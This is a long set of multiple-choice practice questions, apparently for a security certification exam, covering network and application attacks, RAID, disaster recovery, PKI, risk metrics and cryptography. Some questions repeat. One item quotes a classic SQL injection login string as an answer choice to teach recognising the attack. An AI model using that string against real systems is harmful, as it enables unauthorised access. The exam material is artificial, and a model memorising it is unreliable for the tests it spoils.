What defines a reflected DDoS attack?

• Overwhelming the target with a high volume of traffic to saturate its bandwidth

• Exploiting vulnerabilities in network protocols to consume resources and disrupt services

• Utilizing third-party servers to reflect and amplify attack traffic towards the target

• Targeting vulnerabilities in applications or web servers to exhaust resources

A DNS amplification attack is a type of DDoS attack wherein an attacker sends a small, specially
crafted DNS query containing a spoofed IP address (the victim’s IP) to a compromised DNS server.
Upon receiving the query, the DNS server generates a much larger response packet, which is then sent
to the victim's IP address, causing potential disruption due to overwhelming traffic.

• True

• False

Which of the answers listed below refers to a cyberattack technique that relies on providing false DNS
information to a DNS resolver for the purpose of redirecting or manipulating the resolution of domain
names to malicious IP addresses?

• DNS spoofing

• Credential stuffing

• URL hijacking

• Domain hijacking

Remapping a domain name to a rogue IP address is an example of what kind of exploit?

• URL hijacking

• DNS cache poisoning

• Domain hijacking
 • ARP poisoning

When domain registrants due to unlawful actions of third parties lose control over their domain names,
they fall victim to:

• Sybil attack

• Domain hijacking

• Typosquatting

• URL hijacking

Which of the following can be classified as malicious activity indicator on a wireless network?

• Rogue AP

• Jump server

• Unmanaged switch

• Network tap

The practice of gaining unauthorized access to a Bluetooth device is known as:

• Phishing

• Bluejacking

• Smishing

• Bluesnarfing

A wireless disassociation attack is a type of: (Select 2 answers)

• Downgrade attack

• Deauthentication attack

• Brute-force attack

• DoS attack

• Cryptographic attack

A wireless jamming attack is a type of:

• Cryptographic attack

• DoS attack

• Brute-force attack

• Downgrade attack

Which of the answers listed below refers to RFID vulnerability?

• Spoofing

• Eavesdropping
 • RFID cloning

• Data interception

• Replay attack

• DoS attack

• All of the above

Which of the following is a vulnerability characteristic to NFC communication?

• Eavesdropping

• Data interception

• Replay attacks

• DoS attacks

• All of the above

Which wireless attack focuses on exploiting vulnerabilities found in WEP?

• IV attack

• War driving

• SSID spoofing

• Bluejacking

Which of the statements listed below can be used to describe the characteristics of an on-path
attack? (Select all that apply)

• An on-path attack is also known as MITM attack

• Attackers place themselves on the communication route between two devices

• Attackers intercept or modify packets sent between two communicating devices

• Attackers do not have access to packets exchanged during the communication between two
devices

A network replay attack occurs when an attacker captures sensitive user data and resends it to the
receiver with the intent of gaining unauthorized access or tricking the receiver into unauthorized
operations.

• True

• False

What are the characteristic features of a session ID? (Select all that apply)

• Enables the server to identify the session and retrieve the corresponding session data

• A unique identifier assigned by the website to a specific user

• Contains user's authentication credentials, e.g., username and password

 • A piece of data that can be stored in a cookie, or embedded as a URL parameter

• Stored on the client side (in the user's browser) and sent to the server with each request

• A unique identifier assigned to a server

In a session replay attack, an attacker intercepts and steals a valid session ID of a user and resends it
to the server with the intent of gaining unauthorized access to the user's session or tricking the server
into unauthorized operations on behalf of the legitimate user.

• True

• False

A technique that allows an attacker to authenticate to a remote server without extracting cleartext
password from a digest is called:

• Pass the hash

• Replay attack

• Brute-force attack

• Spraying attack

What type of action allows an attacker to exploit the XSS vulnerability?

• Code injection

• Privilege escalation

• Session hijacking

• Packet sniffing

Which of the following exploits targets a protocol used for managing and accessing networked
resources?

• CSRF/XSRF attack

• XML injection attack

• LDAP injection attack

• SQL injection attack

Which type of exploit targets web applications that generate content used to store and transport data?

• SQL injection attack

• CSRF/XSRF attack

• XML injection attack

• LDAP injection attack

Which of the following facilitate(s) privilege escalation attacks? (Select all that apply)

• System/application vulnerabilities

• Password hashing
 • System/application misconfigurations

• Network segmentation

• Social engineering techniques

Which of the statements listed below apply to the CSRF/XSRF attack? (Select 3 answers)

• Exploits the trust a website has in the user's web browser

• A user is tricked by an attacker into submitting unauthorized web requests

• Website executes attacker's requests

• Exploits the trust a user's web browser has in a website

• A malicious script is injected into a trusted website

• User's browser executes attacker's script

A dot-dot-slash attack is also referred to as:

• Disassociation attack

• On-path attack

• Directory traversal attack

• Downgrade attack

Hardware RAID Level 0: (Select all that apply)

• Requires a minimum of 2 drives to implement

• Is also known as disk striping

• Decreases reliability (failure of any disk in the array results in the loss of all data in the array)

• Is also referred to as disk mirroring

• Offers less volume capacity in comparison to RAID 1

• Requires at least 3 drives to implement

• Is suitable for systems where performance has higher priority than fault tolerance

• Offers improved reliability by creating identical data sets on each drive (failure of one drive does
not destroy the array as each drive contains identical copy of the data)

Hardware RAID Level 1: (Select 3 answers)

• Requires at least 2 drives to implement

• Is also known as disk striping

• Offers improved performance in comparison to RAID 0

• Requires at least 3 drives to implement

• Offers improved reliability by creating identical data sets on each drive (failure of one drive does
not destroy the array as each drive contains identical copy of the data)
 • Is also referred to as disk mirroring

Hardware RAID Level 5: (Select 3 answers)

• Requires at least 2 drives to implement

• Continues to operate in case of failure of more than 1 drive

• Is also known as disk striping with double parity

• Requires at least 3 drives to implement

• Offers increased performance and fault tolerance (single drive failure does not destroy the array
and lost data can be re-created by the remaining drives)

• Requires at least 4 drives to implement

• Is also known as disk striping with parity

Hardware RAID Level 6: (Select 3 answers)

• Is also known as disk striping with parity

• Requires at least 4 drives to implement

• Offers increased performance and fault tolerance (failure of up to 2 drives does not destroy the
array and lost data can be re-created by the remaining drives)

• Requires at least 3 drives to implement

• Is also known as disk striping with double parity

• Continues to operate in case of failure of more than 2 drives

• Requires at least 5 drives to implement

Hardware RAID Level 10 (a.k.a. RAID 1+0): (Select 3 answers)

• Requires a minimum of 4 drives to implement

• Is referred to as stripe of mirrors, i.e., a combination of RAID 1 (disk mirroring) and RAID 0 (disk
striping)

• Requires a minimum of 5 drives to implement

• Offers increased performance and fault tolerance (failure of one drive in each mirrored pair of
disk drives does not destroy the array)

• Requires a minimum of 3 drives to implement

• Continues to operate in case of failure of more than 2 drives

• Is referred to as stripe of mirrors, i.e., a combination of RAID 1 (disk striping) and RAID 0 (disk
mirroring)

Which of the following RAID levels does not offer fault tolerance?

• RAID 6

• RAID 10
 • RAID 5

• RAID 0

• RAID 1

Which of the answers listed below refers to the primary function of load balancing?

• Maintains identical copies of data across multiple servers to enhance data availability and
reliability

• Distributes workload across multiple servers for improved performance

• Groups servers together to provide high availability and fault tolerance

• Distributes content geographically across multiple servers to improve performance, reduce

latency, and handle high volumes of traffic

Which of the following is the primary function of clustering?

• Distributes content geographically across multiple servers to improve performance, reduce

latency, and handle high volumes of traffic

• Groups servers together to provide high availability and fault tolerance

• Maintains identical copies of data across multiple servers to enhance data availability and
reliability

• Distributes workload across multiple servers for improved performance

Which of the terms listed below refers to a duplicate of the original site, with fully operational computer
systems as well as near-complete backups of user data?

• Hot site

• Warm site

• Cold site

• Mobile site

Which of the following terms refers to an alternate site that provides some pre-installed hardware and
software and might have partial data backups, but it is not fully operational and requires additional
configuration before use?

• Cold site

• Hot site

• Mirror site

• Warm site

A disaster recovery facility that provides only the physical space for recovery operations is known as:

• Hot site

• Warm site

• Cold site
 • Mirror site

Which alternate site is the least expensive to implement?

• Cold site

• Mirror site

• Warm site

• Hot site

Which alternate site allows for the fastest disaster recovery?

• Cold site

• Hot site

• Mobile site

• Warm site

What is the name of a U.S. government initiative that provides a set of procedures and plans that an
organization can implement to ensure continued performance of its essential functions during
unexpected events?

• SLA

• COOP

• RPO

• BIA

Which of the answers listed below refers to a simulated scenario conducted in a controlled
environment, typically involving discussions and planning around hypothetical security incidents?

• Tabletop exercise

• Sandboxing

• Threat hunting

• Security awareness training

The process of switching to a redundant or standby system upon detecting a disruption in the primary
system is called:

• Fail over

• Multipath I/O

• Load balancing

• Parallel processing

Which of the following answers refers to a more realistic scenario that tests cybersecurity incident
response by mimicking actual attacks?

• Fingerprinting
 • Simulation

• Threat hunting

• Tabletop exercise

Which of the solutions listed below provides redundancy and fault tolerance by dividing tasks into
smaller subtasks and distributing them across multiple systems to be executed simultaneously?

• Load balancing

• Multitasking

• Clustering

• Parallel processing

A file-based representation of the state of a virtual machine at a given point in time is referred to as:

• Restore point

• Shadow copy

• Snapshot

• System image

What type of backups are commonly used with virtual machines?

• Incremental backups

• Snapshot backups

• Tape backups

• Differential backups

Which of the following terms refers to a backup strategy that relies on creating and maintaining copies
of data in real-time or near real-time on a separate system?

• Mirroring

• Virtualization

• Journaling

• Replication

A technique that allows to recover changes that occurred since the last backup in the event of a system
crash is known as:

• Replication

• Journaling

• Virtualization

• Mirroring

Which of the answers listed below refers to a device designed to supply (and monitor the quality of)
electric power to multiple outlets?
 • PSU

• MDF

• PDU

• IDF

What is the name of a device that can provide short-term emergency power during an unexpected main
power source outage?

• UPS

• PoE

• SVC

• PSU

Which of the following power redundancy solutions would be best suited for providing long-term
emergency power during an unexpected main power source outage?

• Dual-power supply

• Standby UPS

• Backup generator

• Managed PDU

As opposed to simple DoS attacks that usually are performed from a single system, a DDoS attack
uses multiple compromised computer systems to perform the attack against its target. The
intermediary systems that are used as a platform for the attack (often referred to as zombies, and
collectively as a botnet) are the secondary victims of the DDoS attack.

• True

• False

A type of DDoS attack where an attacker exploits vulnerabilities in certain services or protocols to
generate responses that are much larger than the original request is referred to as:

• Amplified DDoS attack

• Volumetric DDoS attack

• Reflected DDoS attack

• Application DDoS attack

What defines a reflected DDoS attack?

• Overwhelming the target with a high volume of traffic to saturate its bandwidth

• Exploiting vulnerabilities in network protocols to consume resources and disrupt services

• Utilizing third-party servers to reflect and amplify attack traffic towards the target

• Targeting vulnerabilities in applications or web servers to exhaust resources

A DNS amplification attack is a type of DDoS attack wherein an attacker sends a small, specially
crafted DNS query containing a spoofed IP address (the victim’s IP) to a compromised DNS server.
Upon receiving the query, the DNS server generates a much larger response packet, which is then sent
to the victim's IP address, causing potential disruption due to overwhelming traffic.

• True

• False

Which of the answers listed below refers to a cyberattack technique that relies on providing false DNS
information to a DNS resolver for the purpose of redirecting or manipulating the resolution of domain
names to malicious IP addresses?

• DNS spoofing

• Credential stuffing

• URL hijacking

• Domain hijacking

Remapping a domain name to a rogue IP address is an example of what kind of exploit?

• URL hijacking

• DNS cache poisoning

• Domain hijacking

• ARP poisoning

When domain registrants due to unlawful actions of third parties lose control over their domain names,
they fall victim to:

• Sybil attack

• Domain hijacking

• Typosquatting

• URL hijacking

The practice of gaining unauthorized access to a Bluetooth device is known as:

• Phishing

• Bluejacking

• Smishing

• Bluesnarfing

A wireless disassociation attack is a type of: (Select 2 answers)

• Downgrade attack

• Deauthentication attack

• Brute-force attack

• DoS attack
 • Cryptographic attack

A wireless jamming attack is a type of:

• Cryptographic attack

• DoS attack

• Brute-force attack

• Downgrade attack

Which wireless attack focuses on exploiting vulnerabilities found in WEP?

• IV attack

• War driving

• SSID spoofing

• Bluejacking

Which of the following statements can be used to describe the characteristics of an on-path attack?
(Select all that apply)

• An on-path attack is also known as MITM attack

• Attackers place themselves on the communication route between two devices

• Attackers intercept or modify packets sent between two communicating devices

• Attackers do not have access to packets exchanged during the communication between two
devices

A network replay attack occurs when an attacker captures sensitive user data and resends it to the
receiver with the intent of gaining unauthorized access or tricking the receiver into unauthorized
operations.

• True

• False

What are the characteristic features of a session ID? (Select 3 answers)

• Typically stored on the server side

• A unique identifier assigned by the website to a specific user

• Contains user's authentication credentials, e.g., username and password

• A piece of data that can be stored in a cookie, or embedded as an URL parameter

• Typically stored on the client side (in the user's browser) rather than on the server

• A unique identifier assigned to a server

In a session replay attack, an attacker intercepts and steals a valid session ID of a user and resends it
to the server with the intent of gaining unauthorized access to the user's session or tricking the server
into unauthorized operations on behalf of the legitimate user.

• True
 • False

A technique that allows an attacker to authenticate to a remote server without extracting cleartext
password from a digest is called:

• Pass the hash

• Replay attack

• Brute-force attack

• Spraying attack

Which type of application attack relies on introducing external code into the address space of a running
program?

• Buffer overflow

• Memory injection

• Replay attack

• Pointer dereference

A collection of precompiled functions designed to be used by more than one Microsoft Windows
application simultaneously to save system resources is known as:

• DLL

• API

• EXE

• INI

Which of the answers listed below refers to an application attack that relies on executing a library of
code?

• Memory leak

• DLL injection

• Pointer dereference

• Buffer overflow

A type of exploit in which an application overwrites the contents of a memory area it should not have
access to is called:

• DLL injection

• Buffer overflow

• Memory leak

• Privilege escalation

A malfunction in a preprogrammed sequential access to a shared resource is described as:

• Race condition
 • Concurrency error

• Multithreading

• Synchronization error

A type of vulnerability where the state of a resource is verified at one point in time but may change
before the resource is actually used is referred to as:

• TOC

• TOC/TOU

• TOU

• TSIG

A malicious application update is a type of malware that can be installed through a seemingly
legitimate software update. The introduction of a malicious update into the application code can be
enabled through various means, including:

• Unsigned application code

• Unencrypted update channel (HTTP vs HTTPS)

• Fake update website

• Unauthorized access to update server

• Compromised software development process

• All of the above

Which of the following answers does not refer to a common type of OS-based vulnerability?

• Access control and permissions vulnerabilities (weak passwords, privilege escalation)

• Vulnerabilities in installed applications, system utilities, and device drivers

• Memory-related vulnerabilities (memory leaks, buffer overflows, race conditions)

• Patch and update management vulnerabilities (security patch and update delays, malicious
updates)

• Vulnerabilities related to system/security misconfigurations

• Network-related vulnerabilities (DoS attacks, remote code execution attacks)

• All of the above answer choices are examples of OS-based vulnerabilities

Which of the answers listed below refers to a security vulnerability that enables inserting malicious
code into input fields, such search bars or login forms, to execute unauthorized commands on a
database?

• RCE

• SQLi

• XSS

• CSRF
Which of the following indicates an SQL injection attack attempt?

• DELETE FROM itemDB WHERE itemID = '1';

• SELECT * FROM users WHERE userName = 'Alice' AND password = '' OR '1' = '1';

• DROP TABLE itemDB;

• SELECT * FROM users WHERE email = '[email protected]' AND password = '';

Which of the answers listed below describe the characteristics of a cross-site scripting attack? (Select
3 answers)

• Exploits the trust a user's web browser has in a website

• A malicious script is injected into a trusted website

• User's browser executes attacker's script

• Exploits the trust a website has in the user's web browser

• A user is tricked by an attacker into submitting unauthorized web requests

• Website executes attacker's requests

Which of the terms listed below refers to a situation in which a product or service may no longer receive
security patches or other updates, making it more vulnerable to attack?

• EOL

• ALM

• EOS

• SDLC

What is the main vulnerability related to legacy hardware?

• Compatibility issues

• Lack of security updates and patches

• Worn-out physical components

• Lack of skilled personnel to run it and maintain it

The term "VM escape" refers to the process of breaking out of the boundaries of a guest operating
system installation to access the primary hypervisor controlling all the virtual machines on the host
machine.

• True

• False

Which of the following answers refers to a virtualization-related vulnerability where virtualized assets
allocated to one VM are improperly isolated and can be accessed or compromised by another VM?

• Resource reuse

• Privilege escalation
 • Resource exhaustion

• Concurrent session usage

Which of the answers listed below refers to a cloud-related vulnerability type?

• Insecure APIs

• Poor access controls

• Lack of security updates

• Misconfigured cloud storage

• Shadow IT / Malicious insiders

• All of the above

The practice of installing mobile apps from websites and app stores other than the official
marketplaces is referred to as:

• Jailbreaking

• Rooting

• Sideloading

• Carrier unlocking

Which of the following terms is used to describe the process of removing software restrictions imposed
by Apple on its iOS operating system?

• Sideloading

• Carrier unlocking

• Rooting

• Jailbreaking

The term "Rooting" refers to the capability of gaining administrative access to the operating system and
system applications on:

• Android devices

• iOS devices

• Microsoft devices

• All types of mobile devices

A type of attack aimed at exploiting vulnerability that is present in already released software but
unknown to the software developer is known as:

• On-path attack

• IV attack

• Zero-day attack

• Replay attack
A type of digital document that verifies the identity of an individual, device, service, or organization in
online communications is known as:

• Encryption key

• Digital certificate

• Identity token

• Digital signature

What is the role of RA in PKI? (Select 2 answers)

• Accepting requests for digital certificates

• Validating digital certificates

• Authenticating the entity making the request

• Providing backup source for cryptographic keys

• Issuing digital certificates

Which of the answers listed below refers to a trusted third party responsible for issuing, revoking, and
managing digital certificates?

• RA

• DN

• CA

• CSP

Which of the following answers refers to a means for periodic publication of all digital certificates that
have been revoked?

• CRL

• OSPF

• RA

• CSR

Which of the answers listed below refers to a protocol that enables on-demand querying of the
revocation status of a digital certificate?

• CSP

• OCSP

• DN

• CRL

What is the fastest way to check the validity of a single digital certificate?

• CSR

• DN
 • CRL

• OCSP

Which of the following answers can be used to describe self-signed digital certificates? (Select 3
answers)

• Backed by a well-known and trusted third party

• Not trusted by default by web browsers and other applications

• Used in trusted environments, such as internal networks and development environments

• Suitable for websites and other applications that are accessible to the public

• Trusted by default by web browsers and other applications

• Not backed by a well-known and trusted third party

A self-signed digital certificate is also referred to as:

• Client certificate

• EV certificate

• Server certificate

• Wildcard certificate

• None of the above

Third-party digital certificates, issued by trusted CAs, are automatically trusted by most browsers and
operating systems, involve a cost, and require validation of the applicant's identity. In contrast, self-
signed certificates, issued by the entity to itself, are not automatically trusted, are free to create and
use, and do not require validation by a CA.

• True

• False

In the context of digital certificates, the term "Root of trust" refers to the highest level of trust within a
PKI system. It is typically represented by a root CA, which is a trusted third party that serves as the
foundation for the entire PKI. All other entities in the PKI hierarchy, including intermediate CAs and end-
entities (such as web servers, email servers, user devices, IoT devices, and individual users), derive
their trust from this root. When a certificate is issued and signed by an intermediate CA, it gains trust
through a chain of trust back to the root CA. This hierarchical trust model allows users and systems to
trust certificates presented by websites, services, or individuals because they can trace the trust back
to the well-established root of trust.

• True

• False

Which of the answers listed below refers to a PKI trust model?

• Single CA model

• Hierarchical model (root CA + intermediate CAs)

• Mesh model (cross-certifying CAs)

 • Web of trust model (all CAs function as root CAs)

• Chain of trust model (multiple CAs in a sequential chain)

• Bridge model (cross-certifying between separate PKIs)

• Hybrid model (combining aspects of different models)

• All of the above

Which of the following answers refers to a cryptographic file generated by an entity requesting a digital
certificate from a CA?

• OID

• CSR

• DN

• CRL

A type of digital certificate that can be used to secure multiple subdomains within a primary domain is
called:

• Root signing certificate

• Subject Alternative Name (SAN) certificate

• Extended Validation (EV) certificate

• Wildcard certificate

Which digital certificate type allows to secure multiple domain names or subdomains with a single
certificate?

• Extended Validation (EV) certificate

• Wildcard certificate

• Subject Alternative Name (SAN) certificate

• Root signing certificate

Which of the answers listed below refers to an identifier used for PKI objects?

• OID

• DN

• SAN

• GUID

An SSID is a unique identifier (a.k.a. wireless network name) for a WLAN. Wireless networks advertise
their presence by regularly broadcasting SSID in a special packet called beacon frame. In wireless
networks with disabled security features, knowing the network SSID is enough to get access to the
network. SSID also pinpoints the wireless router that acts as a WAP. Wireless routers from the same
manufacturer are frequently configured with default (well-known) SSID names. Since multiple devices
with the same SSID displayed on the list of available networks create confusion and encourage
accidental access by unauthorized users (applies to networks that lack security), changing the default
SSID is a recommended practice.

• True

• False

For a wireless client to be able to connect to a network, the security type (e.g., WEP, WPA, WPA2, or
WPA3) and encryption type (e.g., TKIP or AES) settings on the connecting host must match the
corresponding wireless security settings on a WAP.

• True

• False

Which of the following answers refers to a security feature used in Bluetooth device pairing?

• SAE

• PIN

• MFA

• ACL

Which of the following solutions would offer the strongest security for a small network that lacks an
authentication server?

• WPA3-SAE

• WPA2-Enterprise

• WPA2-PSK

• WPA3-Enterprise

What are the characteristic features of WPA2/WPA3 Enterprise mode? (Select 3 answers)

• Suitable for large corporate networks

• IEEE 802.1D

• Does not require an authentication server

• IEEE 802.1X

• Suitable for all types of wireless LANs

• Requires RADIUS authentication server

What is the name of the encryption protocol primarily used in Wi-Fi networks implementing the WPA3
security standard?

• AES-CCMP

• CBC-MAC

• AES-GCMP

• WPA-TKIP

Which of the following acronyms refers to a client authentication method used in WPA3 Personal
mode?

• SAE

• IKE

• PSK

• AES

What are the characteristic features of RADIUS? (Select 3 answers)

• Primarily used for network access

• Encrypts the entire payload of the access-request packet

• Combines authentication and authorization

• Encrypts only the password in the access-request packet

• Primarily used for device administration

• Separates authentication and authorization

Which of the wireless encryption schemes listed below offers the highest level of protection?

• WPS

• WPA3

• AES

• TKIP

Which of the following answers refers to a deprecated wireless authentication protocol developed by
Cisco?

• PEAP

• EAP-TTLS

• LEAP

• EAP-TLS

Which of the answers listed below refers to an open standard wireless network authentication protocol
that enhances security by encapsulating authentication process within an encrypted TLS tunnel?

• PEAP

• EAP

• LEAP

• RADIUS

The process of determining potential risks that could affect an organization's ability to achieve its
objectives is called:

• Risk assessment
 • Risk identification

• Risk analysis

• Risk management

The process of evaluating discovered risks to understand their potential impact and likelihood is
referred to as:

• Risk analysis

• Risk assessment

• Risk identification

• Risk management

Which of the following answers refers to a risk assessment method based on need, typically
conducted in response to specific events or changes, such as after a major organizational change or a
security breach?

• Ad hoc

• Recurring

• One-time

• Continuous

Which of the answers listed below refers to an example of recurring risk assessment?

• Real-time monitoring of network security threats

• Assessing risk after a major organizational change or a security breach

• Quarterly or annual risk assessments

• Risk assessment for a new product launch

Which of the following answers refers to a risk assessment conducted for a specific purpose or project,
without plans for regular reassessment (e.g., risk assessment for a new product launch)?

• One-time

• Recurring

• Ad hoc

• Continuous

Which of the answers listed below refers to an example of continuous risk assessment?

• Quarterly or annual risk assessments

• Risk assessment for a new product launch

• Assessing risk after a major organizational change or a security breach

• Real-time monitoring of network security threats

Assessment of risk probability and its impact based on subjective judgment falls into the category of:

• Risk acceptance

• Quantitative risk assessment

• Risk tolerance

• Qualitative risk assessment

A calculation of SLE is an example of:

• Quantitative risk assessment

• Ad hoc risk assessment

• Qualitative risk assessment

• Recurring risk assessment

Which of the following terms is used to describe the predicted loss of value to an asset based on a
single security incident?

• SLE

• ARO

• ALE

• SLA

Which of the acronyms listed below refers to a risk assessment formula defining probable financial
loss due to a risk over a one-year period?

• ARO

• SLE

• ALE

• SLA

Which of the following answers refers to the correct formula for calculating probable financial loss due
to a risk over a one-year period?

• SLE = AV x EF

• ALE = ARO x SLE

• SLE = ALE x AV

• ALE = AV x EF

In quantitative risk assessment, this term is used for estimating the likelihood of occurrence of a future
threat.

• ALE

• SLA

• ARO
 • SLE

An estimate based on the historical data of how often a threat would be successful in exploiting a
vulnerability is known as:

• ALE

• SLA

• ARO

• SLE

In the context of risk assessment, the Exposure Factor (EF) is defined as the percentage of loss that a
realized threat would have on an asset. If an organization has an asset valued at $10,000 and the EF is
determined to be 20%, what would be the SLE?

• $500

• $2,000

• $5,000

• $10,000

Which of the answers listed below refers to a comprehensive document used in risk management and
project management to identify, assess, and track risks?

• Risk register

• Risk heat map

• Risk matrix

• Risk repository

Which of the following terms is used to describe the specific level of risk an organization is prepared to
accept in pursuit of its objectives?

• Risk appetite

• Risk tolerance

• Risk acceptance

• Risk capacity

Which of the terms listed below refers to a general term that describes an organization’s overall
attitude towards risk-taking?

• Risk strategy

• Risk control

• Risk appetite

• Risk tolerance

Contracting out a specialized technical component when the company's employees lack the necessary
skills is an example of:
 • Risk deterrence

• Risk avoidance

• Risk acceptance

• Risk transference

Cybersecurity insurance is an example of which risk management strategy?

• Risk avoidance

• Risk deterrence

• Risk transference

• Risk acceptance

In the context of risk acceptance, choosing not to apply certain controls or safeguards for a specific
risk is called:

• Exception

• Evasion

• Exemption

• Exclusion

In the risk acceptance strategy, the practice of temporarily not complying with a standard or policy due
to a specific risk scenario is referred to as:

• Exclusion

• Exception

• Evasion

• Exemption

Disabling certain system functions or shutting down the system when risks are identified is an example
of:

• Risk acceptance

• Risk avoidance

• Risk transference

• Risk deterrence

Which of the following terms describes the process of taking proactive measures to reduce the impact
of identified risks?

• Risk acceptance

• Risk avoidance

• Risk transference

• Risk mitigation
Which of the acronyms listed below refers to a maximum allowable time to restore critical business
functions after a disruption?

• SLA

• RTO

• MTTF

• RPO

Which of the following defines the maximum acceptable amount of data loss measured by a specific
point in time before a disaster or outage?

• RPO

• MTBF

• RTO

• MTTR

Which of the terms listed below is used to describe the average time required to repair a failed
component or device?

• MTBF

• RPO

• MTTR

• SLA

A high MTBF value indicates that a component or system provides low reliability and is more likely to
fail.

• True

• False

A metric that represents the average amount of time a device or system is expected to operate before
experiencing its first failure is known as:

• MTTR

• SLA

• MTBR

• MTTF

Vulnerability scanning: (Select all that apply)

• Identifies lack of security controls

• Actively tests security controls

• Identifies common misconfigurations

• Exploits vulnerabilities
 • Passively tests security controls

Which of the answers listed below refer to the characteristic features of static code analysis? (Select 3
answers)

• Involves examining the code without executing it

• Often used early in the development process

• Examines code structure, syntax, and semantics to detect issues like syntax errors, coding
standards violations, security vulnerabilities, and bugs

• Typically used later in the software development lifecycle

• Involves executing the code and analyzing its behavior at runtime

• Analyzes runtime properties like memory usage, performance, and error handling to identify
issues such as memory leaks, performance bottlenecks, and runtime errors

Which of the following statements describe the features of dynamic code analysis? (Select 3 answers)

• Typically used later in the software development lifecycle

• Involves examining the code without executing it

• Analyzes runtime properties like memory usage, performance, and error handling to identify
issues such as memory leaks, performance bottlenecks, and runtime errors

• Often used early in the development process

• Examines code structure, syntax, and semantics to detect issues like syntax errors, coding
standards violations, security vulnerabilities, and bugs

• Involves executing the code and analyzing its behavior at runtime

Which of the terms listed below refers to tracking and managing software application components,
such as third-party libraries and other dependencies?

• Version control

• Package monitoring

• Configuration enforcement

• Application hardening

Which of the following terms refers to threat intelligence gathered from publicly available sources?

• IoC

• OSINT

• RFC

• CVE/NVD

Which of the terms listed below refers to a US government initiative for real-time sharing of cyber threat
indicators?

• AIS
 • STIX

• TTP

• CVSS

What is STIX?

• A type of vulnerability database

• Common language for describing cyber threat information

• US government initiative for real-time sharing of cyber threat indicators

• Transport mechanism for cyber threat information

A dedicated transport mechanism for cyber threat information is called:

• TCP/IP

• TLS

• TAXII

• S/MIME

Which of the following provides insights into the methods and tools used by cybercriminals to carry out
attacks?

• CVE

• IoC

• AIS

• TTP

Which of the following statements does not apply to dark web?

• Typically requires specialized software to access its contents

• Forms a large part of the deep web

• Not indexed by traditional search engines

• Often associated with trading stolen data, malware, and cyber threats

Penetration testing: (Select all that apply)

• Bypasses security controls

• Only identifies lack of security controls

• Actively tests security controls

• Exploits vulnerabilities

• Passively tests security controls

A responsible disclosure program is a formal process established by an organization to encourage

security researchers and ethical hackers to report vulnerabilities they discover in the organization's
systems or software. A bug bounty program is a specific type of responsible disclosure program that
offers financial rewards to security researchers for reporting valid vulnerabilities.

• True

• False

An antivirus software identifying non-malicious file as a virus due to faulty virus signature file is an
example of:

• Fault tolerance

• False positive error

• Quarantine feature

• False negative error

Which of the answers listed below refers to a situation where no alarm is raised when an attack has
taken place?

• False negative

• True positive

• False positive

• True negative

A measure of the likelihood that a security system will incorrectly reject an access attempt by an
authorized user is referred to as:

• FAR

• CER

• CRC

• FRR

Which of the following terms refers to a framework and knowledge base that provides understanding of
TTPs used during cyberattacks?

• CVSS

• ATT&CK

• STIX

• TAXII

Which of the answers listed below refers to an industry standard for assessing and scoring the severity
of computer system security vulnerabilities?

• SIEM

• CVSS

• OSINT

• SOAR
Which of the following refers to a system that identifies, defines, and catalogs publicly known
cybersecurity vulnerabilities?

• TAXII

• CVE

• STIX

• CVSS

What is Exposure Factor (EF) in vulnerability analysis?

• The likelihood that a vulnerability will be exploited in a real-world scenario

• The rate at which vulnerabilities are discovered and reported

• The degree of loss that a realized threat would have on a specific asset

• The measure of the potential impact of a vulnerability on an organization's assets

Which of the statements listed below does not refer to a vulnerability response and remediation
technique?

• Applying updates or fixes provided by software vendors to address the vulnerability (patching)

• Ensuring financial recovery from the costs associated with a successful cyberattack (insurance)

• Dividing a network into smaller, isolated zones to limit the potential impact of a vulnerability
(segmentation)

• Mitigating the risk associated with a vulnerability that cannot be immediately patched by
implementing alternative security measures (compensating controls)

• Delaying or forgoing a patch for a specific system, e.g., when applying a patch may not be
feasible due to compatibility issues or potential disruptions to critical systems (exceptions and
exemptions)

• All of the above answers are examples of vulnerability response and remediation techniques

Which of the following answers refers to a data storage device equipped with hardware-level
encryption functionality?

• HSM

• TPM

• EFS

• SED

Which of the answers listed below refers to software technology designed to provide confidentiality for
an entire data storage device?

• TPM

• FDE

• EFS
 • HSM

An MS Windows component that enables encryption of individual files is called:

• SED

• EFS

• BitLocker

• FDE

Which of the following software application tools are specifically designed for implementing
encryption algorithms to secure data communication and storage? (Select 2 answers)

• VPN

• GPG

• SSH

• IPsec

• PGP

What is the name of a network protocol that secures web traffic via SSL/TLS encryption?

• SFTP

• HTTPS

• FTPS

• SHTTP

A network protocol that enables secure file transfer over SSH is known as:

• TFTP

• SFTP

• Telnet

• FTPS

SFTP is an extension of the FTP protocol that adds support for SSL/TLS encryption.

• True

• False

A type of cryptographic network protocol for secure data communication, remote command-line login,
remote command execution, and other secure network services between two networked computers is
called:

• RDP

• SSH

• Telnet
 • SCP

Which part of IPsec provides authentication, integrity, and confidentiality?

• SPD

• PFS

• AH

• ESP

A system that uses public network (such as the Internet) as a means for creating private encrypted
connections between remote locations is referred to as:

• WWAN

• VPN

• PAN

• VLAN

Which protocol enables secure, real-time delivery of audio and video over an IP network?

• S/MIME

• RTP

• SIP

• SRTP

An encryption protocol primarily used in Wi-Fi networks implementing the WPA2 security standard is
known as:

• TKIP

• CCMP

• SSL

• IPsec

Which cryptographic protocol is designed to provide secure communications over a computer network
and is the successor to SSL?

• IPsec

• TLS

• AES

• CCMP

Examples of techniques used for encrypting information include symmetric encryption (also called
public-key encryption) and asymmetric encryption (also called secret-key encryption, or session-key
encryption).

• True
 • False

In asymmetric encryption, any message encrypted with the use of a public key can only be decrypted
by applying the same algorithm and a matching private key (and vice versa).

• True

• False

Which of the algorithms listed below are not symmetric ciphers? (Select 3 answers)

• AES

• DES

• DHE

• ECC

• IDEA

• RC4

• RSA

Which of the following algorithms do(es) not fall into the category of asymmetric encryption? (Select all
that apply)

• AES

• DES

• DHE

• ECC

• IDEA

• RC4

• RSA

The term "KEK" refers to a type of cryptographic key often used in key management systems to add an
additional layer of security when encrypting and decrypting other cryptographic keys.

• True

• False

Which of the answers listed below refers to a protocol used to set up secure connections and
exchange of cryptographic keys in IPsec VPNs?

• SSL

• IKE

• ESP

• DHE

Which of the following answers refers to a key exchange protocol that generates temporary keys for
each session, providing forward secrecy to protect past and future communications?

• PFS

• SHA

• PGP

• DHE

Which of the answers listed below refers to a solution designed to strengthen the security of session
keys?

• ECB

• PFS

• EFS

• PFX

Which of the following answers refers to a cryptographic key exchange protocol that leverages ECC for
enhanced security and efficiency?

• S/MIME

• ECDHE

• DHE

• ECDSA

What is the name of a public-key cryptosystem that leverages the mathematical properties of large
prime numbers to facilitate secure key exchange, create digital signatures, and encrypt data?

• ECC

• RSA

• PKI

• DSA

